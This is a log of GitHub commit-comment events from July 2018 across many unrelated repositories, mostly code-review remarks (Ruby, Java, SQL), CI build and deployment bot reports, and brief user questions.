{"id":"7957689607","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29688542,"position":null,"line":null,"path":null,"commit_id":"6c7e92ce3af2c39dddc0f21485bb5e83d76d845b","created_at":"2018-07-12T17:35:30Z","updated_at":"2018-07-12T17:35:30Z","author_association":"NONE","body":"в классе Поезд:\r\n```ruby\r\n  def speed_down(value)\r\n    if speed >= value\r\n      @speed -= value\r\n    elsif speed < value\r\n      @speed = 0\r\n    end\r\n  end\r\n```\r\nвторая проверка смысла не имеет, так как вариантов всего три и первая проверка уже отфильтовала по 2-м ))"}},"created_at":"2018-07-12T17:35:30Z"}
{"id":"7957704360","type":"CommitCommentEvent","actor":{"login":"Dancopy"},"repo":{"name":"Sooner-Competitive-Robotics/colorduino-slave"},"payload":{"comment":{"id":29688573,"position":null,"line":null,"path":null,"commit_id":"b6f1b5f1ba05708068aac0d2f03c23b8b85201bb","created_at":"2018-07-12T17:38:33Z","updated_at":"2018-07-12T17:38:33Z","author_association":"NONE","body":"Thank you jkleiber and Aehmlo! Could you redirect me to the issue?\r\nI just wanted a sketch with a scrolling text message with a good 8x8 external font with several Colorduino. I do not have enough knowledge to do this;\r\njkleiber: Certainly, your sketch is good enough for a 'scrolling text message' but I do not know where to put the message in the sketch and how to determine several Colorduino.\r\nThank you very much"}},"created_at":"2018-07-12T17:38:33Z"}
{"id":"7957710249","type":"CommitCommentEvent","actor":{"login":"4u7"},"repo":{"name":"Kotlin/anko"},"payload":{"comment":{"id":29688588,"position":null,"line":null,"path":null,"commit_id":"7c1aeb7da23613b30902d667193531d2e1fe52d2","created_at":"2018-07-12T17:39:47Z","updated_at":"2018-07-12T17:39:47Z","author_association":"CONTRIBUTOR","body":"It is not published yet, i'll change version in the docs back"}},"created_at":"2018-07-12T17:39:47Z"}
{"id":"7957710486","type":"CommitCommentEvent","actor":{"login":"bugok"},"repo":{"name":"bugok/pi_sources"},"payload":{"comment":{"id":29688589,"position":null,"line":null,"path":null,"commit_id":"8e9daa97550b822124ea4df650da5b43bc4348d7","created_at":"2018-07-12T17:39:50Z","updated_at":"2018-07-12T17:39:50Z","author_association":"OWNER","body":"@zfjagann, @jaymzh - this is for you."}},"created_at":"2018-07-12T17:39:50Z"}
{"id":"7957711520","type":"CommitCommentEvent","actor":{"login":"calle81"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29688593,"position":null,"line":null,"path":null,"commit_id":"2ce5d1e881609945928829d5b5888b764cc4ad08","created_at":"2018-07-12T17:40:04Z","updated_at":"2018-07-12T17:40:04Z","author_association":"NONE","body":"Great release, thanks for your hard work! :)"}},"created_at":"2018-07-12T17:40:04Z"}
{"id":"7957711586","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29688594,"position":null,"line":null,"path":null,"commit_id":"b8bb95ad74bb4cb7b034ebb6ea161b2ae00db67d","created_at":"2018-07-12T17:40:05Z","updated_at":"2018-07-12T17:40:05Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `coverage`    |    -0.01 |\n| `texts_total` |     1    |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4442)*\n"}},"created_at":"2018-07-12T17:40:05Z"}
{"id":"7957721818","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29688615,"position":null,"line":null,"path":null,"commit_id":"6c7e92ce3af2c39dddc0f21485bb5e83d76d845b","created_at":"2018-07-12T17:42:12Z","updated_at":"2018-07-12T17:42:12Z","author_association":"NONE","body":"вместо проверок типа `route.class == Route` обычно рекомендуется использовать `route.is_a?(Route)` (или `route.instance_of?(Route)`)"}},"created_at":"2018-07-12T17:42:12Z"}
{"id":"7957725171","type":"CommitCommentEvent","actor":{"login":"iNPUTmice"},"repo":{"name":"iNPUTmice/caas"},"payload":{"comment":{"id":29688624,"position":null,"line":null,"path":null,"commit_id":"7f166060a60c557c6bf32dfb825de4c3f92dec84","created_at":"2018-07-12T17:42:52Z","updated_at":"2018-07-12T17:42:52Z","author_association":"OWNER","body":"This can and should probably be done with a join instead of two separate queries"}},"created_at":"2018-07-12T17:42:52Z"}
{"id":"7957728696","type":"CommitCommentEvent","actor":{"login":"baldurk"},"repo":{"name":"baldurk/renderdoc"},"payload":{"comment":{"id":29688630,"position":22,"line":402,"path":"renderdoc/driver/dxgi/dxgi_wrapped.cpp","commit_id":"98a6bb56ca5ecc976aab3b510ffa3d1daf2816fa","created_at":"2018-07-12T17:43:35Z","updated_at":"2018-07-12T17:43:35Z","author_association":"OWNER","body":"This would be better filed as an issue that can be tracked rather than a comment on a commit from 2016.\r\n\r\nThe short answer is that RenderDoc needs to know the target API to properly wrap the resulting interface, in particular to know if it's a D3D11 or D3D12 resource coming back. There might be a solution we can come up with but I need to understand your use-case and restrictions better, can you file an issue about this?"}},"created_at":"2018-07-12T17:43:35Z"}
{"id":"7957730416","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29688634,"position":null,"line":null,"path":null,"commit_id":"6c7e92ce3af2c39dddc0f21485bb5e83d76d845b","created_at":"2018-07-12T17:43:56Z","updated_at":"2018-07-12T17:43:56Z","author_association":"OWNER","body":"Влад попросил добавить, чтобы, в случае, когда скорость окажется отрицательной, speed = 0.\r\n\r\nВот этот комментарий:\r\nhttps://github.com/alexleskov/thinknetica-learning/commit/8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2#r29668316"}},"created_at":"2018-07-12T17:43:56Z"}
{"id":"7957736799","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29688645,"position":null,"line":null,"path":null,"commit_id":"6c7e92ce3af2c39dddc0f21485bb5e83d76d845b","created_at":"2018-07-12T17:45:14Z","updated_at":"2018-07-12T17:45:14Z","author_association":"NONE","body":"почитай еще раз мой комментарий ))\r\nя не против обнуления\r\n"}},"created_at":"2018-07-12T17:45:14Z"}
{"id":"7957737455","type":"CommitCommentEvent","actor":{"login":"xabbuh"},"repo":{"name":"EasyCorp/EasyAdminBundle"},"payload":{"comment":{"id":29688650,"position":null,"line":null,"path":null,"commit_id":"7b3d03fb6437dfe6bd7929a319d85965464d13d3","created_at":"2018-07-12T17:45:21Z","updated_at":"2018-07-12T17:45:21Z","author_association":"CONTRIBUTOR","body":"see #2261"}},"created_at":"2018-07-12T17:45:21Z"}
{"id":"7957737754","type":"CommitCommentEvent","actor":{"login":"iNPUTmice"},"repo":{"name":"iNPUTmice/caas"},"payload":{"comment":{"id":29688651,"position":null,"line":null,"path":null,"commit_id":"7f166060a60c557c6bf32dfb825de4c3f92dec84","created_at":"2018-07-12T17:45:25Z","updated_at":"2018-07-12T17:45:25Z","author_association":"OWNER","body":"General rule; Never make one query one the same database just to feed that output into into another query to the same db. I noticed you doing this before with getting the most recent test iteration number or something. I’ll start going through the code to see if you are doing this elsewhere as well.\r\nLet me know if you have any SQL related questions."}},"created_at":"2018-07-12T17:45:25Z"}
{"id":"7957742895","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29688659,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-12T17:46:25Z","updated_at":"2018-07-12T17:46:25Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T17:46:25Z"}
{"id":"7957743240","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29688660,"position":null,"line":null,"path":null,"commit_id":"6c7e92ce3af2c39dddc0f21485bb5e83d76d845b","created_at":"2018-07-12T17:46:29Z","updated_at":"2018-07-12T17:46:29Z","author_association":"NONE","body":"в случаях типа такого:\r\n```ruby\r\n  def next_station\r\n    if current_station != @route.last_station\r\n      @route.stations[@index_station + 1]\r\n    end\r\n  end\r\n```\r\nлучше писать так:\r\n```ruby\r\nв случаях типа такого:\r\n```ruby\r\n  def next_station\r\n     @route.stations[@index_station + 1] if current_station != @route.last_station\r\n  end\r\n```"}},"created_at":"2018-07-12T17:46:29Z"}
{"id":"7957750944","type":"CommitCommentEvent","actor":{"login":"xd1936"},"repo":{"name":"xd1936/inout2"},"payload":{"comment":{"id":29688675,"position":null,"line":null,"path":null,"commit_id":"f3230ad7e7e6cb4f28d514a7ef499bdd5f45674c","created_at":"2018-07-12T17:48:06Z","updated_at":"2018-07-12T17:48:06Z","author_association":"OWNER","body":"Did you copy and paste the six files in the [src](https://github.com/xd1936/inout2/tree/master/src) folder ([step 2 in the setup section of the README](https://github.com/xd1936/inout2#setup))?"}},"created_at":"2018-07-12T17:48:06Z"}
{"id":"7957751951","type":"CommitCommentEvent","actor":{"login":"ClobberXD"},"repo":{"name":"ClobberXD/capturetheflag"},"payload":{"comment":{"id":29688680,"position":null,"line":null,"path":null,"commit_id":"c7a8998b7c66a6345fed4023c632a5fd02ebd402","created_at":"2018-07-12T17:48:18Z","updated_at":"2018-07-12T17:48:18Z","author_association":"OWNER","body":"\"county\" XD"}},"created_at":"2018-07-12T17:48:18Z"}
{"id":"7957752932","type":"CommitCommentEvent","actor":{"login":"AgelxNash"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29688682,"position":null,"line":null,"path":null,"commit_id":"257734d0906ce11d8f372dd4f22182fb14b3212b","created_at":"2018-07-12T17:48:30Z","updated_at":"2018-07-12T17:48:30Z","author_association":"MEMBER","body":"@bossloper Send to the branch 2.x"}},"created_at":"2018-07-12T17:48:30Z"}
{"id":"7957755178","type":"CommitCommentEvent","actor":{"login":"rubenwardy"},"repo":{"name":"ClobberXD/capturetheflag"},"payload":{"comment":{"id":29688687,"position":null,"line":null,"path":null,"commit_id":"c7a8998b7c66a6345fed4023c632a5fd02ebd402","created_at":"2018-07-12T17:48:58Z","updated_at":"2018-07-12T17:48:58Z","author_association":"NONE","body":"Shit"}},"created_at":"2018-07-12T17:48:58Z"}
{"id":"7957758082","type":"CommitCommentEvent","actor":{"login":"ryker1990"},"repo":{"name":"ControlEverythingCommunity/SI7021"},"payload":{"comment":{"id":29688699,"position":null,"line":null,"path":null,"commit_id":"988884ac1e5c4bf05874dfd3ec2b29c98df3d8bb","created_at":"2018-07-12T17:49:33Z","updated_at":"2018-07-12T17:49:33Z","author_association":"COLLABORATOR","body":"Yes, I have faced similar problem.\nPython smbus library does not support a word read operation. Checkout the\nJava or c code . It may help.\n\nOn 12-Jul-2018 9:55 PM, \"Bertolius\" <notifications@github.com> wrote:\n\n> Yadwinder, I know this is a couple years old, but I put a scope on this\n> code. It appears the bus.ready_byte issues a stop command at the end of the\n> read therefore executing the statement twice in a row.... it's simply\n> reading the same byte twice...instead of getting the whole word. Any\n> thoughts?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ControlEverythingCommunity/SI7021/commit/988884ac1e5c4bf05874dfd3ec2b29c98df3d8bb#commitcomment-29687659>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFxnaMavauIYuaBro1u8dVIfNb5yvL-rks5uF3hjgaJpZM4VNVP4>\n> .\n>\n"}},"created_at":"2018-07-12T17:49:33Z"}
{"id":"7957760394","type":"CommitCommentEvent","actor":{"login":"th-tran"},"repo":{"name":"th-tran/th-tran.github.io"},"payload":{"comment":{"id":29688703,"position":null,"line":null,"path":null,"commit_id":"f6dd018735a7f037756bb711c88e245cde188d95","created_at":"2018-07-12T17:50:01Z","updated_at":"2018-07-12T17:50:01Z","author_association":"OWNER","body":"This was a test deploy."}},"created_at":"2018-07-12T17:50:01Z"}
{"id":"7957764556","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29688718,"position":null,"line":null,"path":null,"commit_id":"6c7e92ce3af2c39dddc0f21485bb5e83d76d845b","created_at":"2018-07-12T17:50:48Z","updated_at":"2018-07-12T17:50:48Z","author_association":"OWNER","body":"Ага, помню.\r\nТолько Sublime  word wrap режет такую длинную строку, потом что она больше 80-100.\r\nЭто условие ведь нужно учитывать, когда хочется использовать постфиксный if?"}},"created_at":"2018-07-12T17:50:48Z"}
{"id":"7957766227","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29688721,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-12T17:51:07Z","updated_at":"2018-07-12T17:51:07Z","author_association":"NONE","body":"159013173_Issue#6243 (mjwitte) - x86_64-MacOS-10.9-clang: OK (2934 of 2934 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T17:51:07Z"}
{"id":"7957770612","type":"CommitCommentEvent","actor":{"login":"jfelrod1960"},"repo":{"name":"Renanse/Ardor3D"},"payload":{"comment":{"id":29688726,"position":null,"line":null,"path":null,"commit_id":"38863508cc3fca59dce852e92aa3a5ec341e887b","created_at":"2018-07-12T17:51:58Z","updated_at":"2018-07-12T17:51:58Z","author_association":"NONE","body":"Just curious ... what is this new ardor3d-opengl_core? :)"}},"created_at":"2018-07-12T17:51:58Z"}
{"id":"7957772192","type":"CommitCommentEvent","actor":{"login":"mahsn"},"repo":{"name":"mahsn/magento2-push"},"payload":{"comment":{"id":29688729,"position":null,"line":null,"path":null,"commit_id":"fd13a64c7ed3ad5139cc3dd15edfa21eddc5ae9a","created_at":"2018-07-12T17:52:17Z","updated_at":"2018-07-12T17:52:17Z","author_association":"OWNER","body":"fix element type problem in di.xml of intelipost/push"}},"created_at":"2018-07-12T17:52:17Z"}
{"id":"7957775107","type":"CommitCommentEvent","actor":{"login":"michaelrsweet"},"repo":{"name":"istopwg/ippsample"},"payload":{"comment":{"id":29688743,"position":null,"line":null,"path":null,"commit_id":"6d2df36ba8676e19d9e0bbe9aca9925c6d66fcf0","created_at":"2018-07-12T17:52:52Z","updated_at":"2018-07-12T17:52:52Z","author_association":"CONTRIBUTOR","body":"@StefanScherer I figured it might, but my experience with Docker and Travis is pretty limited... :/\r\n"}},"created_at":"2018-07-12T17:52:52Z"}
{"id":"7957777671","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Kubecko/Marcin-Kubecko-kodilla-java"},"payload":{"comment":{"id":29688752,"position":39,"line":39,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/builder/bigmac/Bigmac.java","commit_id":"8a4ad0515be9085b57513f2104cafad12c507f38","created_at":"2018-07-12T17:53:24Z","updated_at":"2018-07-12T17:53:24Z","author_association":"NONE","body":"Konstruktor powinien być prywatny"}},"created_at":"2018-07-12T17:53:24Z"}
{"id":"7957780701","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29688759,"position":null,"line":null,"path":null,"commit_id":"45fd15b2b1bfc001a1ec8cd4e8d479fa10d8b26f","created_at":"2018-07-12T17:54:00Z","updated_at":"2018-07-12T17:54:00Z","author_association":"CONTRIBUTOR","body":"@cala please look at this, I added this so that I have 0 conflicts when porting from tbc up and down. This is for outdoors scripts only, instances are still kept like before."}},"created_at":"2018-07-12T17:54:00Z"}
{"id":"7957781481","type":"CommitCommentEvent","actor":{"login":"zhurlik"},"repo":{"name":"Brest-Java-Course-2018/Dmitriy-Shestak"},"payload":{"comment":{"id":29688764,"position":4,"line":5,"path":"rest-service/src/main/java/com/moro/restService/OrderRestServiceImpl.java","commit_id":"0bcfb58854d872e3c348ef48e6e49b2e72ad8038","created_at":"2018-07-12T17:54:10Z","updated_at":"2018-07-12T17:54:10Z","author_association":"NONE","body":"replace all imports log4j -> org.slf4j"}},"created_at":"2018-07-12T17:54:10Z"}
{"id":"7957788359","type":"CommitCommentEvent","actor":{"login":"zhurlik"},"repo":{"name":"Brest-Java-Course-2018/Dmitriy-Shestak"},"payload":{"comment":{"id":29688775,"position":17,"line":19,"path":"rest-service/src/main/java/com/moro/restService/OrderRestServiceImpl.java","commit_id":"0bcfb58854d872e3c348ef48e6e49b2e72ad8038","created_at":"2018-07-12T17:55:32Z","updated_at":"2018-07-12T17:55:32Z","author_association":"NONE","body":"extract to app properties"}},"created_at":"2018-07-12T17:55:32Z"}
{"id":"7957790731","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29688781,"position":null,"line":null,"path":null,"commit_id":"b72530e37019e8a7531888167f7bc7b6510ffcf8","created_at":"2018-07-12T17:56:00Z","updated_at":"2018-07-12T17:56:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-175559 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-175559\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T17:56:00Z"}
{"id":"7957791184","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29688784,"position":null,"line":null,"path":null,"commit_id":"3923a16286573676e7a80d6a4877d0876f104c87","created_at":"2018-07-12T17:56:05Z","updated_at":"2018-07-12T17:56:05Z","author_association":"COLLABORATOR","body":"Имейте ввиду, кто включит RUCK_FLAG_PREFERRED, нужно добавить default_to_ruck = false как минимум в [device_pda] и [bolt]. А то болт не достать. Насчет ПДА не уверен, но мне кажется лучше ему тоже добавить этот параметр, что бы автоматически в слот шел.\r\n"}},"created_at":"2018-07-12T17:56:05Z"}
{"id":"7957792908","type":"CommitCommentEvent","actor":{"login":"skeeto"},"repo":{"name":"skeeto/emacsql"},"payload":{"comment":{"id":29688789,"position":null,"line":null,"path":null,"commit_id":"3b70e8f5dd6cc127b68d039772e2818eee49a5d2","created_at":"2018-07-12T17:56:25Z","updated_at":"2018-07-12T17:56:25Z","author_association":"OWNER","body":"I was going to point out that the strings passed to emacsql-quote-scalar \nare already the output of the printer. However, you've reminded me of \nprint-escape-control-characters, which I had totally forgotten. I've \nswitched to this in 6f1e375. Thanks!\n"}},"created_at":"2018-07-12T17:56:25Z"}
{"id":"7957795062","type":"CommitCommentEvent","actor":{"login":"strumet"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29688796,"position":null,"line":null,"path":null,"commit_id":"1beccd51969f27f1c1b9cd973410d9a38024bd33","created_at":"2018-07-12T17:56:50Z","updated_at":"2018-07-12T17:56:50Z","author_association":"OWNER","body":"Ciao Silvia,\r\nil controllo veloce dei tuoi esercizi cad effettuato ieri non mi ha permesso di accorgermi di un errore nell'EX03 relativo alle dimensioni del setto murario: dal tuo disegno risulta infatti che lunghezza e altezza siano uguali (250cm) mentre l'esercizio indica misure differenti.\r\nPurtroppo, per adesso, non posso procedere oltre (in compenso l'EX02 è stato accettato).\r\nmf"}},"created_at":"2018-07-12T17:56:50Z"}
{"id":"7957796870","type":"CommitCommentEvent","actor":{"login":"curtischong"},"repo":{"name":"curtischong/hackthe6ix17"},"payload":{"comment":{"id":29688803,"position":null,"line":null,"path":null,"commit_id":"e09392006413fa63b7aacab9210da01c66c87c31","created_at":"2018-07-12T17:57:13Z","updated_at":"2018-07-12T17:57:13Z","author_association":"OWNER","body":"This project is really bugging me"}},"created_at":"2018-07-12T17:57:13Z"}
{"id":"7957797183","type":"CommitCommentEvent","actor":{"login":"ericmuyser"},"repo":{"name":"hyperbridge/blockhub-web-client"},"payload":{"comment":{"id":29688807,"position":713,"line":850,"path":"src/ui/screens/account-signup/index.vue","commit_id":"1e87b52cb6b445917469cee1c8c91667165e95f0","created_at":"2018-07-12T17:57:17Z","updated_at":"2018-07-12T17:57:17Z","author_association":"MEMBER","body":"verification-info__icon"}},"created_at":"2018-07-12T17:57:17Z"}
{"id":"7957797946","type":"CommitCommentEvent","actor":{"login":"ericmuyser"},"repo":{"name":"hyperbridge/blockhub-web-client"},"payload":{"comment":{"id":29688810,"position":732,"line":869,"path":"src/ui/screens/account-signup/index.vue","commit_id":"1e87b52cb6b445917469cee1c8c91667165e95f0","created_at":"2018-07-12T17:57:25Z","updated_at":"2018-07-12T17:57:25Z","author_association":"MEMBER","body":"verification-info__text"}},"created_at":"2018-07-12T17:57:25Z"}
{"id":"7957801072","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29688818,"position":null,"line":null,"path":null,"commit_id":"5e7f777940c32ef39ea6c7e175707ee04c6b7f99","created_at":"2018-07-12T17:58:00Z","updated_at":"2018-07-12T17:58:00Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Code: Parallel processing for calculating time interval (keep `numpy`) with concurrent (topogan)](https://trello.com/c/doq9P07W/51-code-parallel-processing-for-calculating-time-interval-keep-numpy-with-concurrent-topogan)"}},"created_at":"2018-07-12T17:58:00Z"}
{"id":"7957801599","type":"CommitCommentEvent","actor":{"login":"ericmuyser"},"repo":{"name":"hyperbridge/blockhub-web-client"},"payload":{"comment":{"id":29688819,"position":695,"line":834,"path":"src/ui/screens/account-signup/index.vue","commit_id":"1e87b52cb6b445917469cee1c8c91667165e95f0","created_at":"2018-07-12T17:58:07Z","updated_at":"2018-07-12T17:58:07Z","author_association":"MEMBER","body":"button-blk__button"}},"created_at":"2018-07-12T17:58:07Z"}
{"id":"7957802554","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29688821,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-12T17:58:18Z","updated_at":"2018-07-12T17:58:18Z","author_association":"NONE","body":"159013173_Issue#6243 (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2934 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T17:58:18Z"}
{"id":"7957803115","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29688822,"position":null,"line":null,"path":null,"commit_id":"e72321b482df75f883c93584a4b2436cc8e5b0d1","created_at":"2018-07-12T17:58:24Z","updated_at":"2018-07-12T17:58:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-175824 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-175824\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T17:58:24Z"}
{"id":"7957803758","type":"CommitCommentEvent","actor":{"login":"ericmuyser"},"repo":{"name":"hyperbridge/blockhub-web-client"},"payload":{"comment":{"id":29688826,"position":654,"line":795,"path":"src/ui/screens/account-signup/index.vue","commit_id":"1e87b52cb6b445917469cee1c8c91667165e95f0","created_at":"2018-07-12T17:58:32Z","updated_at":"2018-07-12T17:58:32Z","author_association":"MEMBER","body":"unknown-blk__counts"}},"created_at":"2018-07-12T17:58:32Z"}
{"id":"7957803810","type":"CommitCommentEvent","actor":{"login":"gsollazzo"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29688827,"position":null,"line":null,"path":null,"commit_id":"1199a4873fa1b37b835f60f8c8f6bc189b4461a1","created_at":"2018-07-12T17:58:32Z","updated_at":"2018-07-12T17:58:32Z","author_association":"NONE","body":"Hi!\r\nI'm from EXSigma. The script used on _sport.sky.it_ and hosted on _cdn.exsigma.eu_ is not a user tracking script (we do not set third party cookies to track users between websites), it's more of a pageviews counter. You can inspect the get request to check the collected data.\r\n\r\nWe have a support page [https://support.exsigma.com/mercurio.html](https://support.exsigma.com/mercurio.html) where you can find more info regarding the collected data (everything is deleted after 30 days).\r\n\r\nWhat steps can we do to get removed from the list? By blocking the whole domain, other resources (mostly .css) are blocked.\r\n\r\nThanks!"}},"created_at":"2018-07-12T17:58:32Z"}
{"id":"7957803877","type":"CommitCommentEvent","actor":{"login":"zaphod-42"},"repo":{"name":"ControlEverythingCommunity/SI7021"},"payload":{"comment":{"id":29688829,"position":null,"line":null,"path":null,"commit_id":"988884ac1e5c4bf05874dfd3ec2b29c98df3d8bb","created_at":"2018-07-12T17:58:33Z","updated_at":"2018-07-12T17:58:33Z","author_association":"CONTRIBUTOR","body":"There was a pending pull request that corrected this issue. It has been merged. #2 "}},"created_at":"2018-07-12T17:58:33Z"}
{"id":"7957804240","type":"CommitCommentEvent","actor":{"login":"ericmuyser"},"repo":{"name":"hyperbridge/blockhub-web-client"},"payload":{"comment":{"id":29688830,"position":648,"line":790,"path":"src/ui/screens/account-signup/index.vue","commit_id":"1e87b52cb6b445917469cee1c8c91667165e95f0","created_at":"2018-07-12T17:58:38Z","updated_at":"2018-07-12T17:58:38Z","author_association":"MEMBER","body":"unknown-blk"}},"created_at":"2018-07-12T17:58:38Z"}
{"id":"7957805002","type":"CommitCommentEvent","actor":{"login":"X7SHaDe"},"repo":{"name":"Haxk20/android_kernel_sony_u8500"},"payload":{"comment":{"id":29688834,"position":8,"line":360,"path":"include/linux/rcupdate.h","commit_id":"547cd3667779dc9c2be6623e5c5ca0545927bdf8","created_at":"2018-07-12T17:58:47Z","updated_at":"2018-07-12T17:58:47Z","author_association":"NONE","body":"Fix white space. Indent smp_wbm();"}},"created_at":"2018-07-12T17:58:47Z"}
